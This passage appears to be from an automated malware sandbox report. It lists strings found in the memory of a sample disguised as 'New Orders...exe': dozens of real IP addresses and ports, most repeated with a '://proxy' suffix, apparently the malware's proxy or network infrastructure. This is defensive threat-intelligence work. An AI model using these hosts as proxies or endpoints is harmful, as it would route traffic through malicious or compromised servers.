                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.25.234.175:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3.25.234.175:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.180.218:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.180.218:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.5.178:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.146.5.178:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.148.207.153:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.204.28.96:5432
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.204.28.96:5432://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.207.38.66:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.130.237:8192
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.130.237:8192://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.142.115:8192
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.211.142.115:8192://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.184.143
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.184.143://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.223.184.143:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50109
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50109://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50687
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:50687://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:52173
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.24.44.92:52173://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.158.108:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.158.108:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.160:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.179.214:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.63.70:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.43.63.70:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.44.82.2:38080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://31.44.82.2:38080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.142.206.26:9081://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://32.223.6.94:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.154.161.152:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.23.45.223:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.75.202.63:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.79.91.3:59040
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.79.91.3:59040://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.83.143.6:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.83.143.6:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.84.95.189:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.84.95.189:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.85.177.170:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.85.177.170:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.84.105
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.84.105://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.87.84.105:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.93.157.87:21802
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.93.157.87:21802://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.154.71.72:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.154.71.72:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.196.18.239
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.196.18.239://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.196.18.239:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.199.90.225:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.199.90.225:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.237.210.215:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.237.210.215:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.134.91.82:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.134.91.82:8888://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.104.1:13623
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.104.1:13623://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.37.244.41:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.37.244.41:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.132.91:3127
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.132.91:3127://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.22.18:8199
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.22.18:8199://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.133.19:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.133.19:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.36.252:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.36.252:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.14.195:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.14.195:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.27.189:39674
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.27.189:39674://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.90.61.224:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.90.61.224:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.107.245:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.107.245:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.116.162:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.116.162:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.117.59:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.117.59:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.148.36:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.148.36:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.193.189
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.193.189://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.193.189:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29838000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.81.181:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.81.181:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.189.165:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.189.165:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.140.158:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.140.158:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.187.59
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.187.59://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.187.59:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.192.154:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.192.154:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.148.217.234:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.148.217.234:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.152.163.95:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.152.163.95:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.146.163:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.146.163:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.24.201:81
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.24.201:81://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:41385
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:41385://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:10710
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:10710://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:13412://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:14470
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:14470://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:18936
